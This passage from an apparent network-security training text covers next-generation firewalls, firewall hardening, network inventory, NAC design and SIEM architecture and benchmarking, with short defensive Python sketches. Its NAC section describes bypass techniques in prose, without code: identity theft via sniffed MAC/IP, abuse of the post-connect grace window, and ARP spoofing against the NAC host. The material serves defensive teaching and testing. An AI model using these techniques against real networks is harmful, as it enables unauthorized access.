User-ID seamlessly integrates Palo Alto Networks next-generation firewalls with the widest range of enterprise directories on the market: Active Directory, eDirectory, OpenLDAP and most other LDAP-based directory servers. The User-ID agent communicates with the domain controllers, forwarding the relevant user information to the firewall and making the policy tie-in completely transparent to the end-user.
Identifying users via a browser challenge.
In cases where a user cannot be automatically identified through a user repository, a captive portal can be used to identify users and enforce user-based security policy. In order to make the authentication process completely transparent to the user, Captive Portal can be configured to send an NTLM authentication request to the web browser instead of an explicit username and password prompt.
Integrate user information from other user repositories.
In cases where organizations have a user repository or application that already has knowledge of users and their current IP addresses, an XML-based REST API can be used to tie the repository to the Palo Alto Networks next-generation firewall.
  • 44. 216 | P a g e Transparently extend user-based policies to non-Windows devices. User-ID can be configured to constantly monitor for logon events produced by Mac OS X, Apple iOS, Linux/UNIX clients accessing their Microsoft Exchange email. By expanding the User-ID support to non-Windows platforms, organizations can deploy consistent application enablement policies. Visibility and control over terminal services users. In addition to support for a wide range of directory services, User-ID provides visibility and policy control over users whose identity is obfuscated by a Terminal Services deployment (Citrix or Microsoft). Completely transparent to the user, every session is correlated to the appropriate user, which allows the firewall to associate network connections with users and groups sharing one host on the network. Once the applications and users are identified, full visibility and control within ACC, policy editing, logging and reporting is available. High Performance Threat Prevention Content-ID combines a real-time threat prevention engine with a comprehensive URL database and elements of application identification to limit unauthorized data and file transfers, detect and block a wide range of threats and control non-work related web surfing. The application visibility and control delivered by App-ID, combined with the content inspection enabled by Content-ID means that IT departments can regain control over application traffic and the related content.
  • 45. 217 | P a g e NSS-rated IPS.
The NSS-rated IPS blocks known and unknown vulnerability exploits, buffer overflows, DoS attacks and port scans from compromising and damaging enterprise information resources. IPS mechanisms include:
 Protocol decoder-based analysis statefully decodes the protocol and then intelligently applies signatures to detect vulnerability exploits.
 Protocol anomaly-based protection detects non-RFC-compliant protocol usage, such as the use of an overlong URI or overlong FTP login.
 Stateful pattern matching detects attacks across more than one packet, taking into account elements such as the arrival order and sequence.
 Statistical anomaly detection prevents rate-based DoS flooding attacks.
 Heuristic-based analysis detects anomalous packet and traffic patterns, such as port scans and host sweeps.
 Custom vulnerability or spyware phone-home signatures that can be used in either the anti-spyware or vulnerability protection profiles.
 Other attack protection capabilities, such as blocking invalid or malformed packets, IP defragmentation and TCP reassembly, are utilized for protection against evasion and obfuscation methods employed by attackers.
Traffic is normalized to eliminate invalid and malformed packets, while TCP reassembly and IP defragmentation are performed to ensure the utmost accuracy and protection despite any attack evasion techniques.
URL Filtering
Complementing the threat prevention and application control capabilities is a fully integrated URL filtering database consisting of 20 million URLs across 76 categories that enables IT departments to monitor and control employee web surfing activities. The on-box URL database can be augmented to suit the traffic patterns of the local user community with a custom, 1 million URL database. URLs that
  • 46. 218 | P a g e are not categorized by the local URL database can be pulled into cache from a hosted, 180 million URL database. In addition to database customization, administrators can create custom URL categories to further tailor the URL controls to suit their specific needs. URL filtering visibility and policy controls can be tied to specific users through the transparent integration with enterprise directory services (Active Directory, LDAP, eDirectory), with additional insight provided through customizable reporting and logging.
File and Data Filtering
Data filtering features enable administrators to implement policies that will reduce the risks associated with the transfer of unauthorized files and data.
 File blocking by type: Control the flow of a wide range of file types by looking deep within the payload to identify the file type (as opposed to looking only at the file extension).
 Data filtering: Control the transfer of sensitive data patterns such as credit card and social security numbers in application content or attachments.
 File transfer function control: Control the file transfer functionality within an individual application, allowing application use yet preventing undesired inbound or outbound file transfer.
Checkpoint R75 – Application Control Blade
Granular application control
 Identify, allow, block or limit usage of thousands of applications by user or group
 UserCheck technology alerts users about controls and educates them on Web 2.0 risks and policies
  • 47. 219 | P a g e  Embrace the power of Web 2.0 Social Technologies and applications while protecting against threats and malware Largest application library with AppWiki  Leverages the world's largest application library with over 240,000 Web 2.0 applications and social network widgets  Identifies, detects, classifies and controls applications for safe use of Web 2.0 social technologies and communications  Intuitively grouped in over 80 categories—including Web 2.0, IM, P2P, Voice & Video and File Share Integrated into Check Point Software Blade Architecture  Centralized management of security policy via a single console  Activate application control on any Check Point security gateway  Supported gateways include: UTM-1, Power-1, IP Appliances and IAS Appliances Main Functionalities  Application detection and usage control  Enables application security policies to identify, allow, block or limit usage of thousands of applications, including Web 2.0 and social networking, regardless of port, protocol or evasive technique used to traverse the network.  AppWiki application classification library  AppWiki enables application scanning and detection of more than 4,500 distinct applications and over 240,000 Web 2.0 widgets including instant messaging, social networking, video streaming, VoIP, games and more.  Inspect SSL Encrypted Traffic  Scan and secure SSL encrypted traffic passing through the gateway, such as HTTPS.  UserCheck  UserCheck technology alerts employees in real-time about their application access limitations, while educating them on Internet risk and corporate usage policies.  User and machine awareness  Integration with the Identity Awareness Software Blade enables users of the Application Control Software Blade to define granular policies to control applications usage. 
 Central policy management  Centralized management offers unmatched leverage and control of application security policies and enables organizations to use a single repository for user and group definitions, network objects, access rights and security policies.  Unified event management  Using SmartEvent to view user’s online behavior and application usage provides organizations with the most granular level of visibility.
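The file-blocking-by-type capability described above (identifying a file by looking deep within the payload rather than trusting the extension) can be sketched as a magic-byte lookup. This is an illustrative sketch, not any vendor's implementation; the signature table is a small assumed subset and the function names are hypothetical.

```python
# Illustrative subset of well-known "magic byte" signatures.
MAGIC_SIGNATURES = [
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip"),            # also docx/xlsx/jar containers
    (b"MZ", "exe"),                    # Windows PE executable
    (b"\x7fELF", "elf"),               # Linux/Unix executable
    (b"\x89PNG\r\n\x1a\n", "png"),
]

def identify_file_type(payload: bytes) -> str:
    """Return a file type based on leading magic bytes, or 'unknown'."""
    for magic, ftype in MAGIC_SIGNATURES:
        if payload.startswith(magic):
            return ftype
    return "unknown"

def should_block(payload: bytes, blocked_types: set) -> bool:
    """Policy check: block by real content type, ignoring the filename."""
    return identify_file_type(payload) in blocked_types
```

A renamed executable (`report.pdf` that actually starts with `MZ`) is still caught, which is the point of payload-based file blocking.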
  • 48. 220 | P a g e Utilizing Firewalls for Maximum Security 1. Don’t use an old, non-application-aware firewall 2. The first firewall rule must be to deny all protocols on all ports from all IPs to all IPs 3. Only rules for required systems must be allowed. For example: a. HTTP, HTTPS – to all b. IMAPS to the internal mail server c. NetBIOS to the internal file server, etc. 4. Activate application inspection on all traffic on all ports 5. Enforce that only the defined traffic types are allowed on each port. For example, on port 80 only identified HTTP traffic would be allowed. 6. Don’t allow forwarding of any traffic that failed inspection. 7. Define the DNS server as the Domain Controller, do not allow recursive/authoritative DNS requests, and make sure the firewall inspects the Domain Controller’s outgoing DNS requests in STRICT mode. 8. Activate egress filtering to avoid sending spoofed packets and unknowingly, unwillingly participating in DDoS attacks. Implementing a Back-Bone Application-Aware Firewall Implementing a back-bone application-aware firewall is the ideal security solution for complete network control. The best configuration is: 1. Combining full Layer 2 security in switch and router equipment 2. Dividing all of the organization’s devices into VLANs that represent the organization’s logical groups 3. Implementing each port in each of the VLANs as PVLAN Edge, so that no endpoint can talk to any other endpoint via Layer 2. 4. Defining all routers to forward all traffic to the firewall (their next hop at the higher level) 5. Placing an application-aware firewall on the backbone, in front of the backbone router Network Inventory & Monitoring How to map your network connections? 1. Since everyday IT management involves many tasks, no one really inspects the currently open connections. 2. It is possible to configure the firewall to log every established TCP connection and every host that sent any packet (ICMP, UDP) to any non-TCP port.
  • 49. 221 | P a g e 3. The result of such a configuration is a list of unknown IPs. It is possible to write an automatic script that executes a reverse-DNS lookup and an IP WHOIS search on each IP and creates a “resolved list” that has some meaning to it. 4. Any unknown/unfamiliar IP accessed from within the network requires matching the stations that accessed it and performing a basic forensic investigation on them in order to discover the software that made the connection. 5. This process is very technical and time consuming, requires especially skilled security professionals, and therefore is not executed unless a security incident was reported. 6. The only solution that turns this process from impossible into very reasonable and simple is IP/Domain/URL whitelisting, which denies everything except a database of known, well-reputed and malware-free approved IPs/websites. 7. IP/Domain/URL whitelisting is very hard to implement and requires a high amount of maintenance; it is up to you to make your choice. How to discover all network devices? 1. Mapping of the network is provided by firewalls, anti-viruses, NACs, SIEMs and configuration management products. 2. Some products include an agent that runs on the endpoint, acts as a network sensor and reports all the machines that passively or actively communicated on its subnet. 3. It is possible to purchase a “Network Inventory Management” solution. The most reliable way to detect all machines on the network is to combine: 1. The switches, which know all the ports that carry an electrical signal and know the MAC of every device that ever sent a non-spoofed Layer 2 frame on a port. 2. Connecting via SNMP to the switches and extracting all MACs and IPs on all ports 3. A full TCP and UDP scan of ports 1 to 65535 across the entire network (without any ping or is-alive scans). 
If there is a hidden machine listening on a self-assigned IP on a specific TCP/UDP port, it will answer at least one packet and will be detected by the scan. Detecting “Hidden” Machines – Machines behind a NAT INSIDE Your Network 1. Looking for timing anomalies in ICMP and TCP 2. Looking for IP ID strangeness a. NAT with Windows on a Linux host might have non-incremental IPID packets interspersed with incremental IPID packets 3. Looking for unusual headers in packets a. Timestamps and other optional parameters may have inherent patterns How to discover all cross-network installed software? There are two common ways to discover the software installed on the network’s machines:
  • 50. 222 | P a g e 1. Agent-Less – discovery is done by connecting to the machine remotely through: a. RPC/WMI b. SNMP On Windows systems, WMI provides most of the classical functionality, though it only detects software installed by “Windows Installer” and software registered in the “Uninstall” registry key. Some machines can’t be “managed”/connected to remotely over the network because: 1. They have a firewall installed or configured to block WMI/RPC access 2. They have a permission error, e.g. “Domain Administrator” removed from the “Local Administrators” group 3. They are not part of the domain – they were never reported and registered 2. Agent-Based – provides the maximum level of discovery; the agent can scan the memory, raw disk, files and folders locally and report back all of the detected software. Once the agent is installed, most of the common permission, firewall, connectivity and latency problems are solved. The main problem is machines the agent was removed from and stray machines that never had the agent installed. 3. The Ultimate Solution – combining agent-based with agent-less technology; this way all devices get detected and most of the available information is extracted from them. NAC The Problem: Ethernet Network  Authenticate (Who?): o distinguish between valid and rogue members  Control (Where to and How?): o all network members at the network level  Authorize (Application Layer Conditions): o check device compliance according to company policy
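The authenticate/control/authorize flow just listed can be sketched as a single policy decision. This is an assumed, illustrative model (the attribute names and VLAN actions are hypothetical), not any NAC vendor's API.

```python
def nac_decision(device):
    """Sketch of a NAC admission decision.
    device: dict with boolean attributes 'known_mac' (authenticated),
    'av_updated' and 'patched' (compliance posture)."""
    if not device.get("known_mac"):
        return "guest-vlan"           # rogue/foreign machine: quarantine
    if not (device.get("av_updated") and device.get("patched")):
        return "remediation-vlan"     # valid member, but non-compliant
    return "allow"                    # authenticated and compliant
```

Real products take the same three-stage shape: identity first, posture second, full access only when both pass.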
  • 51. 223 | P a g e What is a NAC originally?  The concept was invented in 2003 originally called “Network Admission Control”  The idea: checking the software version on machines connecting to the network  The Action: denying connection for those below the standard Today’s NAC?  Re-Invented as: Network Access Control  Adding to the old idea: Disabling ANY foreign machines from connecting into a computer network  The Actions: o Shuts down the power on that port of the switch o Move foreign machine to Guest VLAN Why Invent Today’s NAC?
  • 52. 224 | P a g e Dynamic Solution for a Dynamic Environment Did We EVER Manage Who Gets IP Access? What is a NAC? Network Access Control (NAC) is a computer networking solution that uses a set of protocols to define and implement a policy that describes how to secure access to network nodes by devices when they initially attempt to access the network. NAC might integrate the automatic remediation process (fixing non-compliant nodes before allowing access) into the network systems, allowing
  • 53. 225 | P a g e the network infrastructure such as routers, switches and firewalls to work together with back office servers and end user computing equipment to ensure the information system is operating securely before interoperability is allowed. Network Access Control aims to do exactly what the name implies—control access to a network with policies, including pre-admission endpoint security policy checks and post-admission controls over where users and devices can go on a network and what they can do. Initially 802.1X was also thought of as NAC. Some still consider 802.1X the simplest form of NAC, but most people think of NAC as something more. Simple Explanation When a computer connects to a computer network, it is not permitted to access anything unless it complies with a business-defined policy, including anti-virus protection level, system update level and configuration. While the computer is being checked by a pre-installed software agent, it can only access resources that can remediate (resolve or update) any issues. Once the policy is met, the computer is able to access network resources and the Internet, within the policies defined within the NAC system. NAC is mainly used for endpoint health checks, but it is often tied to role-based access. Access to the network will be given according to the profile of the person and the results of a posture/health check. For example, in an enterprise, the HR department could access only HR department files if both the role and the endpoint meet anti-virus minimums. Goals of NAC Because NAC represents an emerging category of security products, its definition is both evolving and controversial. The overarching goals of the concept can be distilled to: 1. 
Mitigation of zero-day attacks The key value proposition of NAC solutions is the ability to prevent end-stations that lack antivirus, patches, or host intrusion prevention software from accessing the network and placing other computers at risk of cross-contamination of computer worms. 2. Policy enforcement NAC solutions allow network operators to define policies, such as the types of computers or roles of users allowed to access areas of the network, and enforce them in switches, routers, and network middle boxes.
  • 54. 226 | P a g e 3. Identity and access management Where conventional IP networks enforce access policies in terms of IP addresses, NAC environments attempt to do so based on authenticated user identities, at least for user end- stations such as laptops and desktop computers. NAC Approaches  Agent-Full o Smarter, Unlimited Features o Faster o Works Offline (Settings Cache Mode) o Endpoint Management Itself is more secure  Agent-Less o Modular o Easy to integrate o Credentials constantly travel the network o SNMP Traps and DHCP Requests
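One of the agent-less signals listed above is the DHCP request. A client's DHCP "parameter request list" (option 55) tends to be characteristic of its operating system, so an agent-less NAC can fingerprint endpoints passively. A minimal sketch follows; the fingerprint values in the table are illustrative assumptions, not an authoritative fingerprint database.

```python
# Map of (option 55 parameter request list) -> coarse OS family.
# Values here are illustrative only; real deployments use a curated
# fingerprint database.
KNOWN_FINGERPRINTS = {
    (1, 3, 6, 15, 31, 33): "windows-like",
    (1, 28, 2, 3, 15, 6): "linux-like",
}

def classify_dhcp_client(param_request_list):
    """Classify an endpoint from its DHCP option 55 contents."""
    return KNOWN_FINGERPRINTS.get(tuple(param_request_list), "unknown")
```

An "unknown" result is itself a signal: a device whose fingerprint matches nothing expected on that subnet is a candidate for quarantine.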
  • 55. 227 | P a g e NAC – Behavior Lifecycle NAC = LAN Mini IPS?  NAC is one of the functions that a full end to end IPS product should provide  Some vendors don’t sell NAC as a proprietary module, for example: o ForeScout CounterAct  NAC only Solutions by o Trustwave o Mcafee NAC as Part of Endpoint Security Solutions  Antivirus Vendors provide NAC (Network Admission Control) on managed endpoints  Vendors like Symantec, Mcafee and Sophos  A great solution IF: o The AV Management server controls the switches and disconnects all non- managed hosts o Except exclusions (Printers, Cameras, Physical Access Devices) Talking Endpoints: What’s a NAP?  NAP is Microsoft’s built-in support client for NAC  NAP interoperates with every switch and access point  Controlled by Group Policy
  • 56. 228 | P a g e General Basic NAC Deployment NAC Deployment Types: 1. Pre-admission and post-admission There are two prevailing design philosophies in NAC, based on whether policies are enforced before or after end-stations gain access to the network. In the former case, called pre-admission NAC, end-stations are inspected prior to being allowed on the network. A typical use case of pre-admission NAC would be to prevent clients with out-of-date antivirus signatures from talking to sensitive servers. Alternatively, post-admission NAC makes enforcement decisions based on user actions, after those users have been provided with access to the network. 2. Agent versus agentless The fundamental idea behind NAC is to allow the network to make access control decisions based on intelligence about end-systems, so the manner in which the network is informed about end-systems is a key design decision. A key difference among NAC systems is whether they require agent software to report end-system characteristics, or
  • 57. 229 | P a g e whether they use scanning and network inventory techniques to discern those characteristics remotely. As NAC has matured, Microsoft now provides its Network Access Protection (NAP) agent as part of its Windows 7, Vista and XP releases. There are NAP-compatible agents for Linux and Mac OS X that provide near-equal intelligence for these operating systems. 3. Out-of-band versus inline In some out-of-band systems, agents are distributed on end-stations and report information to a central console, which in turn can control switches to enforce policy. In contrast, inline solutions can be single-box solutions which act as internal firewalls for access-layer networks and enforce the policy. Out-of-band solutions have the advantage of reusing existing infrastructure; inline products can be easier to deploy on new networks, and may provide more advanced network enforcement capabilities, because they are directly in control of individual packets on the wire. However, there are products that are agentless and have the inherent advantages of easier, less risky out-of-band deployment, but use techniques to provide inline effectiveness for non-compliant devices, where enforcement is required. NAC Acceptance Tests 1. Attempting to get an IP using DHCP in a regular Windows machine. 2. Attempting to get an IP using DHCP in a regular Linux machine.
  • 58. 230 | P a g e 3. Multiple attempts to get an IP using DHCP with a private DHCP client, using different values than the operating system’s in the DHCP packet fields 4. Manually configuring a local IP of type “Link-Local” 5. Manually configuring an IP in the network’s IP range with “Gratuitous ARP” on 6. Manually configuring an IP in the network’s IP range with “Gratuitous ARP” off 7. Inspecting the NAC’s response to DHCP attacks and network attacks during the “1–2 minutes of grace” 8. Restricting WMI (RPC) support on the local machine (even using a firewall to block RPC on TCP port 135) 9. Copying/stealing the identity (IP or IP+MAC) of an existing user (obtained via passive network sniffing of broadcasts) 10. Using private denial-of-service 0-day exploits in a loop on a specific machine to obtain its identity on the network 11. Posing as a printer or another non-smart device (printers, biometric devices, turnstile controllers, door devices, etc.) 12. Testing the proper enforcement of common basic NAC protection features such as:  Duplicate MAC  Duplicate IP  Foreign MAC  Foreign IP  Wake-on-LAN  Domain Membership  Anti-Virus + Definitions NAC Vulnerabilities Attacking a NAC mostly relies on network attacks and focuses on several aspects:  Vulnerabilities introduced by the integration process – wrong product positioning in the network architecture or wrong design of the data flow, which results in different levels of security. These mistakes are caused mostly by the following: o The integrator’s lack of understanding of the organization’s requirements, systems and network architecture o The integrator’s lack of understanding of the organization’s security policies and its expectations from the product
  • 59. 231 | P a g e o Insufficient involvement of the organization’s IT personnel in the integration process o Lack of security auditing by a certified information security professional to determine the product’s real-life performance  Vulnerabilities caused by configuration – wrong configuration of the functionalities the product enforces within the organization, such as: o Not enforcing/monitoring lab/development environments o Not enforcing/monitoring different VLANs and networks, such as the VoIP network o Not blocking/monitoring non-interactive network features such as Wake-on-LAN o Not analyzing and responding to anomalies in relevant elements/protocols, insufficient network lock-out times  Vulnerabilities in the product (vendor’s code) The common attack – Bypassing & Killing the NAC 1. Some of today’s NACs are event based, so the network equipment (switch/router) allows you to connect to the network and get an IP, but some time after you connect, it sends a message notifying the NAC of your IP and MAC, and the NAC tries to connect to your machine and validate that it is an approved member of the network. 2. The alerting mechanism from the switches is mostly SNMP alerts called “SNMP traps”. 3. This behavior grants the attacker one to two minutes to attack/take over/infect some machines on the network before his port’s power is disconnected. 4. In most cases, if the port is shut down, after 5 minutes the NAC wakes it back to life in order to keep the organization operable and to accept new devices. 5. For a well-prepared hacker, with automatic scripts exploiting the most common vulnerabilities and utilizing the latest exploits, this is sufficient. 6. The real problem is that a large share of NAC vendors provide a product which is software based and therefore installed mostly on common Windows or Linux machines. 7. 
As is well known, common Windows and Linux machines are vulnerable to many application layer and operating system vulnerabilities, but virtually all of them are vulnerable to network attacks, especially Layer 2 attacks. 8. This means that in those 1 or 2 minutes which become available every 5 minutes, which comes out to 5 to 10 minutes per hour, the attacker can find the Windows/Linux machine hosting the NAC software and kill the communication to it using basic Layer 2 attacks such as ARP spoofing.
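The defensive counterpart of the ARP spoofing attack just described is arpwatch-style monitoring: track the MAC last seen for each IP and flag any change, which is how spoofing against the NAC host would typically surface. A minimal sketch (the function name and tuple format are illustrative assumptions):

```python
def detect_arp_changes(arp_replies):
    """arp_replies: iterable of (ip, mac) pairs observed on the wire.
    Returns a list of (ip, old_mac, new_mac) alerts whenever the MAC
    claimed for an IP changes -- the classic ARP-spoofing symptom."""
    seen = {}
    alerts = []
    for ip, mac in arp_replies:
        if ip in seen and seen[ip] != mac:
            alerts.append((ip, seen[ip], mac))
        seen[ip] = mac
    return alerts
```

A legitimate DHCP reassignment also triggers an alert, so real deployments correlate these events with DHCP logs before acting.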
  • 60. 232 | P a g e Open Source Solutions  OpenNAC/FreeNAC  PacketFence OpenNAC/FreeNAC – Keeping It Simple
  • 62. 234 | P a g e PacketFence – Almost Commercial Quality
  • 66. 238 | P a g e SIEM (Security Information and Event Management) SIEM solutions are a combination of the formerly disparate product categories of SIM (Security Information Management) and SEM (Security Event Management). SIEM technology provides real-time analysis of security alerts generated by network hardware and applications. SIEM solutions come as software, appliances or managed services, and are also used to log security data and generate reports for compliance purposes. The acronyms SEM, SIM and SIEM have been used interchangeably, though there are differences in meaning and product capabilities. The segment of security management that deals with real-time monitoring, correlation of events, notifications and console views is commonly known as Security Event Management (SEM). The second area provides long-term storage, analysis and reporting of log data and is known as Security Information Management (SIM). The term Security Information and Event Management (SIEM), coined by Mark Nicolett and Amrit Williams of Gartner in 2005, describes the product capabilities of gathering, analyzing and presenting information from network and security devices; identity and access management applications; vulnerability management and policy compliance tools; operating system, database and application logs; and external threat data. A key focus is to monitor and help manage user and service privileges, directory services and other system configuration changes, as well as providing log auditing and review and incident response. As of January 2012, Mosaic Security Research identified 85 unique SIEM products. SIEM Capabilities  Data Aggregation: SIEM/LM (log management) solutions aggregate data from many sources, including network, security, servers, databases and applications, providing the ability to consolidate monitored data to help avoid missing crucial events. 
 Correlation: looks for common attributes, and links events together into meaningful bundles. This technology provides the ability to perform a variety of correlation techniques to integrate different sources, in order to turn data into useful information.  Alerting: the automated analysis of correlated events and production of alerts, to notify recipients of immediate issues.  Dashboards: SIEM/LM tools take event data and turn it into informational charts to assist in seeing patterns, or identifying activity that is not forming a standard pattern.  Compliance: SIEM applications can be employed to automate the gathering of compliance data, producing reports that adapt to existing security, governance and auditing processes.  Retention: SIEM/SIM solutions employ long-term storage of historical data to facilitate correlation of data over time, and to provide the retention necessary for compliance requirements.
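The correlation capability listed above — linking events that share common attributes into "meaningful bundles" — can be sketched in a few lines. This is an assumed, simplified model (events as dicts keyed by source IP, a fixed time window), not a production correlation engine.

```python
def correlate_events(events, window_seconds=60):
    """Bundle events from the same source IP that occur within
    window_seconds of the previous event from that source.
    events: list of dicts with 'time' (epoch seconds) and 'src_ip'."""
    bundles = []
    open_bundle = {}  # src_ip -> currently open bundle
    for ev in sorted(events, key=lambda e: e["time"]):
        key = ev["src_ip"]
        bundle = open_bundle.get(key)
        if bundle and ev["time"] - bundle[-1]["time"] <= window_seconds:
            bundle.append(ev)          # extend the existing bundle
        else:
            bundle = [ev]              # start a new bundle
            open_bundle[key] = bundle
            bundles.append(bundle)
    return bundles
```

Real SIEM correlation rules add more dimensions (destination, event type, user), but the bundling principle is the same.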
  • 67. 239 | P a g e SIEM Architecture  Low level, real-time detection of known threats and anomalous activity (unknown threats)  Compliance automation  Network, host and policy auditing  Network behavior analysis and situational behavior  Log Management  Intelligence that enhances the accuracy of threat detection  Risk oriented security analysis  Executive and technical reports  A scalable high performance architecture
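The "risk oriented security analysis" item above can be made concrete with the per-event risk formula popularized by OSSIM, the open-source SIEM whose sensor stack (Snort, Ntop, OpenVAS, etc.) matches the module breakdown in this section. Treat the exact scales as an assumption drawn from OSSIM's documentation rather than a universal standard.

```python
def event_risk(asset_value, priority, reliability):
    """OSSIM-style per-event risk score.
    asset_value: 0-5, importance of the targeted asset
    priority:    0-5, severity of the event type
    reliability: 0-10, confidence that the event is a real attack
    Returns risk on a 0-10 scale: (asset * priority * reliability) / 25."""
    return (asset_value * priority * reliability) / 25
```

The division by 25 simply normalizes the 5 × 5 × 10 maximum product back onto a 0-10 scale, so a critical asset hit by a high-severity, high-confidence event scores 10.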
  • 68. 240 | P a g e A SIEM is Comprised of a Few Main Modules: 1. Detector  Intrusion Detection  Anomaly Detection  Vulnerability Detection  Discovery, Learning and Network Profiling systems  Inventory systems 2. Collector  Connectors to Windows machines  Connectors to Linux machines  Connectors to network devices  Classifies the information and events  Normalizes the information 3. SIEM  Risk Assessment  Correlation
  • 69. 241 | P a g e  Risk metrics  Vulnerability scanning  Data mining for events  Real-time monitoring 4. Logger  Stores the data in the filesystem/DB  Allows storage of an unlimited number of events  Supports SAN/NAS storage 5. Management Console & Dashboard  Configuration changes  Access to dashboard and metrics  Multi-tenant and multi-user management  Access to real-time information  Report generation  Ticketing system  Vulnerability management  Network flow management  Response configuration A SIEM Detector Module is Comprised of Sensors:  Intrusion Detection  Anomaly Detection  Vulnerability Detection  Discovery, Learning and Network Profiling systems  Inventory systems Commonly Used Open Source SIEM Sensors: 1. Snort (network intrusion detection system) 2. Ntop (network and usage monitoring) 3. OpenVAS (vulnerability scanning) 4. P0f (passive operating system detection) 5. Pads (passive asset detection system) 6. Arpwatch (Ethernet/IP address pairing monitor) 7. OSSEC (host intrusion detection system) 8. Osiris (host integrity monitoring) 9. Nagios (availability monitoring) 10. OCS (inventory)
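The collector's "normalize" step listed above turns each device's raw log line into a common event schema. A minimal sketch follows; the regex targets one illustrative firewall-log format (the field names and layout are assumptions, since every device has its own syntax).

```python
import re

# One illustrative log format: "<host> <program>: ACCEPT|DROP src=... dst=..."
LOG_PATTERN = re.compile(
    r"(?P<host>\S+)\s+(?P<program>\w+):\s+(?P<action>ACCEPT|DROP)\s+"
    r"src=(?P<src>\S+)\s+dst=(?P<dst>\S+)"
)

def normalize(raw_line):
    """Parse a raw log line into a normalized event dict, or None
    if the line does not match this collector's format."""
    m = LOG_PATTERN.search(raw_line)
    if m is None:
        return None
    return m.groupdict()
```

A real collector ships one such parser per device family and maps all of them onto the same field names, which is what makes cross-device correlation possible downstream.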
  • 70. 242 | P a g e SIEM Logics
  • 71. 243 | P a g e Planning for the right amounts of data Introduction Critical business systems and their associated technologies are typically held to performance benchmarks. In the security space, benchmarks of speed, capacity and accuracy are common for encryption, packet inspection, assessment, alerting and other critical protection technologies. But how do you set benchmarks for a tool based on collection, normalization and correlation of security events from multiple logging devices? And how do you apply these benchmarks to today’s diverse network environments? This is the problem with benchmarking Security Information Event Management (SIEM) systems, which collect security events from one to thousands of devices, each with its own different log data format. If we take every conceivable environment into consideration, it is impossible to benchmark SIEM systems. We can, however, set one baseline environment against which to benchmark and then include equations so that organizations can extrapolate their own benchmark requirements. Consider that network and application firewalls, network and host Intrusion Detection/Prevention (IDS/IPS), access controls, sniffers, and Unified Threat Management systems (UTM)—all log security events that must be monitored. Every switch, router, load balancer, operating system, server, badge reader, custom or legacy application, and many other IT systems across the enterprise, produce logs of security events, along with every new system to follow (such as virtualization). Most have their own log expression formats. Some systems, like legacy applications, don’t produce logs at all. First we must determine what is important. Do we need all log data from every critical system in order to perform security, response, and audit? Will we need all that data at lightning speed? (Most likely, we will not.) How much data can the network and collection tool actually handle under load? 
What is the threshold before the network bottlenecks and/or the SIEM is rendered unusable, not unlike a denial of service (DoS)? These are variables that every organization must consider as they hold SIEM to the standards that best suit their operational goals. Why is benchmarking SIEM important? According to the National Institute of Standards and Technology (NIST), SIEM software is a relatively new type of centralized logging software compared to syslog. Our SANS Log Management Survey shows 51 percent of respondents ranked collecting logs as their most critical challenge – and collecting logs is a basic feature a SIEM system can provide. Further, a recent NetworkWorld article explains how different SIEM products typically integrate well with selected logging tools, but not with all tools. This is due to the disparity between logging and reporting formats from different systems. There is an effort under way to standardize logs through MITRE’s Common Event Expression (CEE) standard event log language.
  • 72. 244 | P a g e But until all logs look alike, normalization is an important SIEM benchmark, which is measured in events per second (EPS). Event performance characteristics provide a metric against which most enterprises can judge a SIEM system. The true value of a SIEM platform, however, will be in terms of Mean Time To Remediate (MTTR) or other metrics that can show the ability of rapid incident response to mitigate risk and minimize operational and financial impact. In our second set of benchmarks for storage and analysis, we have addressed the ability of SIEM to react within a reasonable MTTR rate to incidents that require automatic or manual intervention. Because this document is a benchmark, it does not cover the important requirements that cannot be benchmarked, such as requirements for integration with existing systems (agent vs. agent-less, transport mechanism, ports and protocols, interface with change control, usability of user interface, storage type, integration with physical security systems, etc.). Other requirements that organizations should consider but aren’t benchmarked include the ability to process connection-specific flow data from network elements, which can be used to further enhance forensic and root-cause analysis. Other features, such as the ability to learn from new events, make recommendations and store them locally, and filter out incoming events from known infected devices that have been sent to remediation, are also important features that should be considered, but are not benchmarked here. Variety and type of reports available, report customization features, role-based policy management and workflow management are more features to consider as they apply to an individual organization’s needs but are not included in this benchmark. In addition, organizations should look at a SIEM tool’s overall history of false positives, something that can be benchmarked, but is not within the scope of this paper. 
In place of false positives, Table 2 focuses on accuracy rates within applicable categories. These and other considerations are included in the following equations, sample EPS baseline for a medium-sized enterprise, and benchmarks that can be applied to storage and analysis. As appendices, we’ve included a device map for our sample network and a calculation worksheet for organizations to use in developing their own EPS benchmarks. SIEM Benchmarking Process The matrices that follow are designed as guidelines to assist readers in setting their own benchmark requirements for SIEM system testing. While this is a benchmark checklist, readers must remember that benchmarking, itself, is governed by variables specific to each organization. For a real-life example, consider an article in eSecurity Planet, in which Aurora Health in Michigan estimated that they produced 5,000–10,000 EPS, depending upon the time of day. We assume that means during the normal ebb and flow of network traffic. What would that load look like if it were under attack? How many security events would an incident, such as a virus outbreak on one, two or three subnets, produce?
  • 73. 245 | P a g e An organization also needs to consider its devices. For example, a Nokia high-availability firewall is capable of handling more than 100,000 connections per second, each of which could theoretically create a security event log. This single device would seem to imply a need for a minimum of 100,000 EPS just for firewall logs. However, research shows that SIEM products typically handle 10,000–15,000 EPS per collector. Common sense tells us that we should be able to handle as many events as ALL our devices could simultaneously produce as a result of a security incident. But that isn’t a likely scenario, nor is it practical or necessary. Aside from the argument that no realistic scenario would involve all devices sending maximum EPS, so many events at once would create network bottlenecks and overload the SIEM collectors, rendering them useless. So, it is critical to create a methodology for prioritizing event relevance during times of load so that even during a significant incident, critical event data is getting through, while ancillary events are temporarily filtered. Speed of hardware, NICs (network interface cards), operating systems, logging configurations, network bandwidth, load balancing and many other factors must also go into benchmark requirements. One may have two identical server environments with two very different EPS requirements due to any or all of these and other variables. With consideration of these variables, EPS can be established for normal and peak usage times. We developed the equations included here, therefore, to determine Peak Events (PE) per second and to establish normal usage by exchanging the PEx for NEx (Normal Events per second). List all of the devices in the environment expected to report to the SIEM. Be sure to consider any planned changes, such as adding new equipment, consolidating devices, or removing end-of-life equipment. First, determine the PE (or NE) for each device with these steps: 1. 
Carefully select only the security events intended to be collected by the SIEM. Make sure those are the only events included in the sample being used for the formula. 2. Select reasonable time frames of known activity: Normal and Peak (under attack, if possible). This may be any period from minutes to days. A longer period of time, such as a minimum of 90 days, will give a more accurate average, especially for “normal” activity. Total the number of Normal or Peak events during the chosen period. (It will also be helpful to consider computing a “low” activity set of numbers, because fewer events may be interesting as well.) 3. Determine the number of seconds within the time frame selected. 4. Divide the number of events by the number of seconds to determine PE or NE for the selected device. Formula 1: EPS = # of Security Events ÷ Time Period in Seconds
